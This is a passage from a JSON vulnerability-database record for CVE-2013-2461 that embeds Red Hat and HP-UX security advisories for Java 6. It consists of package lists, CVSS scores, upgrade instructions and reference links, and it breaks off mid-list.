6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.62.1.11.11.90.el6_4.src.rpm\n\nx86_64:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.62.1.11.11.90.el6_4.src.rpm\n\ni386:\njava-1.6.0-openjdk-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.62.1.11.11.90.el6_4.src.rpm\n\ni386:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.62.1.11.11.90.el6_4.src.rpm\n\ni386:\njava-1.6.0-openjdk-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.62.1.11.11.90.el6_4.src.rpm\n\ni386:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2013-1500.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-1571.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2407.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2412.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2443.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2444.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2445.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2446.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2447.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2448.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2450.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2452.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2453.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2455.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2456.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2457.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2459.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2461.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2463.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2465.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2469.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2470.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2471.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2472.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2473.html\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2013 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.4 (GNU/Linux)\n\niD8DBQFR1FwzXlSAg2UNWIIRAr2aAJ9j03lh/R8goDWLLqCz9VdH4bM1jACgkYVl\nx3jKc8cs/WwK8V5nIG2hJ0Q=\n=LPQe\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c03874547\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c03874547\nVersion: 1\n\nHPSBUX02908 rev.1 - HP-UX Running Java6, Remote Unauthorized Access,\nDisclosure of Information, and Other Vulnerabilities\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2013-07-31\nLast Updated: 2013-07-31\n\nPotential Security Impact: Remote unauthorized access, disclosure of\ninformation, and other vulnerabilities\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified in the Java Runtime\nEnvironment (JRE) and the Java Developer Kit (JDK) running on HP-UX. \nHP-UX B.11.11, B.11.23, and B.11.31 running HP JDK and JRE v6.0.19 and\nearlier. \n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2013-1500 (AV:L/AC:L/Au:N/C:P/I:P/A:N) 3.6\nCVE-2013-1571 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3\nCVE-2013-2407 (AV:N/AC:L/Au:N/C:P/I:N/A:P) 6.4\nCVE-2013-2412 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2013-2433 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3\nCVE-2013-2437 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2013-2442 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2013-2444 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2013-2445 (AV:N/AC:L/Au:N/C:N/I:N/A:C) 7.8\nCVE-2013-2446 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2013-2447 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2013-2448 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6\nCVE-2013-2450 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2013-2451 (AV:L/AC:H/Au:N/C:P/I:P/A:P) 3.7\nCVE-2013-2452 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2013-2453 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2013-2454 (AV:N/AC:M/Au:N/C:P/I:P/A:N) 5.8\nCVE-2013-2455 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2013-2456 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2013-2457 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2013-2459 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-2461 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2013-2463 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-2464 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-2465 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-2466 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-2468 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-2469 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-2470 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-2471 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-2472 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-2473 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-3743 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided the following Java version upgrade to resolve these\nvulnerabilities. \n\nThe upgrade is available from the following location\n\nhttp://www.hp.com/java\n\nOS Version\n Release Version\n\nHP-UX B.11.11, B.11.23, B.11.31\n JDK and JRE v6.0.20 or subsequent\n\nMANUAL ACTIONS: Yes - Update\nFor Java v6.0 update to Java v6.0.20 or subsequent\nPRODUCT SPECIFIC INFORMATION\n\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application\nthat replaces HP-UX Security Patch Check. It analyzes all Security Bulletins\nissued by HP and lists recommended actions that may apply to a specific HP-UX\nsystem. It can also download patches and create a depot automatically. For\nmore information see https://www.hp.com/go/swa\n\nThe following text is for use by the HP-UX Software Assistant. \n\nAFFECTED VERSIONS\n\nHP-UX B.11.11\nHP-UX B.11.23\n===========\nJdk60.JDK60-COM\nJdk60.JDK60-PA20\nJdk60.JDK60-PA20W\nJre60.JRE60-COM\nJre60.JRE60-COM-DOC\nJre60.JRE60-PA20\nJre60.JRE60-PA20-HS\nJre60.JRE60-PA20W\nJre60.JRE60-PA20W-HS\nJdk60.JDK60-IPF32\nJdk60.JDK60-IPF64\nJre60.JRE60-COM\nJre60.JRE60-IPF32\nJre60.JRE60-IPF32-HS\nJre60.JRE60-IPF64\nJre60.JRE60-IPF64-HS\naction: install revision 1.6.0.20.00 or subsequent\n\nHP-UX B.11.23\nHP-UX B.11.31\n===========\nJdk60.JDK60-COM\nJdk60.JDK60-IPF32\nJdk60.JDK60-IPF64\nJre60.JRE60-IPF32\nJre60.JRE60-IPF32-HS\nJre60.JRE60-IPF64\nJre60.JRE60-IPF64-HS\nJre60.JRE60-COM\nJre60.JRE60-IPF32\nJre60.JRE60-IPF32-HS\nJre60.JRE60-IPF64\nJre60.JRE60-IPF64-HS\naction: install revision 1.6.0.20.00 or subsequent\n\nEND AFFECTED VERSIONS\n\nHISTORY\nVersion:1 (rev.1) - 31 July 2013 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2013 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits;damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners", "sources": [ { "db": "NVD", "id": "CVE-2013-2461" }, { "db": "BID", "id": "60645" }, { "db": "VULMON", "id": "CVE-2013-2461" }, { "db": "PACKETSTORM", "id": "127267" }, { "db": "PACKETSTORM", "id": "122085" }, { "db": "PACKETSTORM", "id": "122075" }, { "db": "PACKETSTORM", "id": "126195" }, { "db": "PACKETSTORM", "id": "122438" }, { "db": "PACKETSTORM", "id": "122109" }, { "db": "PACKETSTORM", "id": "122439" }, { "db": "PACKETSTORM", "id": "122273" }, { "db": "PACKETSTORM", "id": "122653" } ], "trust": 2.07 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2013-2461", "trust": 2.3 }, { "db": "BID", "id": "60645", "trust": 1.4 }, { "db": "SECUNIA", "id": "54154", "trust": 1.1 }, { "db": "USCERT", "id": "TA13-169A", "trust": 1.1 }, { "db": "HITACHI", "id": "HS13-015", "trust": 0.3 }, { "db": "ICS CERT", "id": "ICSA-17-213-02", "trust": 0.3 }, { "db": "JUNIPER", "id": "JSA10642", "trust": 0.3 }, { "db": "VULMON", "id": "CVE-2013-2461", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127267", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "122085", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "122075", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126195", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "122438", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "122109", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "122439", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "122273", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "122653", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2013-2461" }, { "db": "BID", "id": "60645" }, { "db": "PACKETSTORM", "id": "127267" }, { "db": "PACKETSTORM", "id": "122085" }, { "db": "PACKETSTORM", "id": "122075" }, { "db": "PACKETSTORM", "id": "126195" }, { "db": "PACKETSTORM", "id": "122438" }, { "db": "PACKETSTORM", "id": "122109" }, { "db": "PACKETSTORM", "id": "122439" }, { "db": "PACKETSTORM", "id": "122273" }, { "db": "PACKETSTORM", "id": "122653" }, { "db": "NVD", "id": "CVE-2013-2461" } ] }, "id": "VAR-201306-0238", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 1.0 }, "last_update_date": "2024-07-23T19:58:18.960000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Ubuntu Security Notice: openjdk-7 vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-1907-1" }, { "title": "Ubuntu Security Notice: icedtea-web update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-1907-2" }, { "title": "Ubuntu Security Notice: openjdk-6 vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-1908-1" }, { "title": "Debian Security Advisories: DSA-2727-1 openjdk-6 -- several vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=e7d6ea8eb77ee8911e5bbc08ff43f55c" }, { "title": "Debian Security Advisories: DSA-2722-1 openjdk-7 -- several vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=29128f887c1069c9cc8e265bacca4512" }, { "title": "Amazon Linux AMI: ALAS-2013-207", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2013-207" }, { "title": "Amazon Linux AMI: ALAS-2013-204", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2013-204" } ], "sources": [ { "db": "VULMON", "id": "CVE-2013-2461" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "NVD-CWE-noinfo", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2013-2461" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.6, "url": "http://www.oracle.com/technetwork/topics/security/javacpujun2013-1899847.html" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2013-0963.html" }, { "trust": 1.2, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html" }, { "trust": 1.2, "url": "http://security.gentoo.org/glsa/glsa-201406-32.xml" }, { "trust": 1.2, "url": "http://www.securityfocus.com/bid/60645" }, { "trust": 1.1, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=975126" }, { "trust": 1.1, "url": "http://hg.openjdk.java.net/jdk7u/jdk7u-dev/jdk/rev/abe9ea5a50d2" }, { "trust": 1.1, "url": "http://secunia.com/advisories/54154" }, { "trust": 1.1, "url": "http://www.us-cert.gov/ncas/alerts/ta13-169a" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=137545592101387\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=137545505800971\u0026w=2" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2013:183" }, { "trust": 1.1, "url": "http://advisories.mageia.org/mgasa-2013-0185.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html" }, { "trust": 1.1, "url": "http://www.vmware.com/security/advisories/vmsa-2014-0012.html" }, { "trust": 1.1, "url": "http://seclists.org/fulldisclosure/2014/dec/23" }, { "trust": 1.1, "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a19582" }, { "trust": 1.1, "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a19565" }, { "trust": 1.1, "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a16887" }, { "trust": 1.1, "url": "https://access.redhat.com/errata/rhsa-2014:0414" }, { "trust": 1.1, "url": "http://www.securityfocus.com/archive/1/534161/100/0/threaded" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2456" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2407" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2447" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2452" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1571" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2461" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2463" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2445" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1500" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2412" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2448" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2465" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2446" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2444" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2450" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2453" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2469" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2455" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2457" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2443" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2459" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2454" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2451" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2470" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-2412.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-2463.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-2446.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-1500.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-2455.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-2456.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-2459.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-2461.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-2444.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-2445.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-2407.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-2447.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-2452.html" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2458" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-2470.html" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2449" }, { "trust": 0.4, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-1571.html" }, { "trust": 0.4, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-2448.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-2465.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-2472.html" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2472" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-2471.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-2453.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-2473.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-2469.html" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2471" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-2443.html" }, { "trust": 0.4, "url": "https://access.redhat.com/security/team/key/#package" }, { "trust": 0.4, "url": "http://bugzilla.redhat.com/):" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-2450.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-2457.html" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2437" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2442" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10642\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg400001621" }, { "trust": 0.3, "url": "http://www.oracle.com/index.html" }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-213-02" }, { "trust": 0.3, "url": "http://alerts.hp.com/r?2.1.3kt.2zr.xg7ek.jtfhr2..t.cyta.7%2a%2ak.bw89mq%5f%5fdehufqb0" }, { "trust": 0.3, "url": "http://alerts.hp.com/r?2.1.3kt.2zr.xg7ek.jtfhr2..t.cytc.7%2a%2ak.bw89mq%5f%5fdeoifqd0" }, { "trust": 0.3, "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs13-015/index.html" }, { "trust": 0.3, "url": "http://www.ibm.com/developerworks/java/jdk/alerts/" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100173341" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1019760" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100175056" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21644918" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004514" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21645500" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21648074" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24036927" }, { "trust": 0.3, "url": "http://www.ubuntu.com/usn/usn-1908-1/" }, { "trust": 0.3, "url": "http://www.xerox.com/download/security/security-bulletin/12047-4e4eed8d42ca6/cert_xrx13-007_v1.0.pdf" }, { "trust": 0.3, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-2454.html" }, { "trust": 0.3, "url": "https://access.redhat.com/knowledge/articles/11258" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2464" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2468" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2466" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2473" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2460.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2449.html" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2460" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2458.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2468.html" }, { "trust": 0.2, "url": 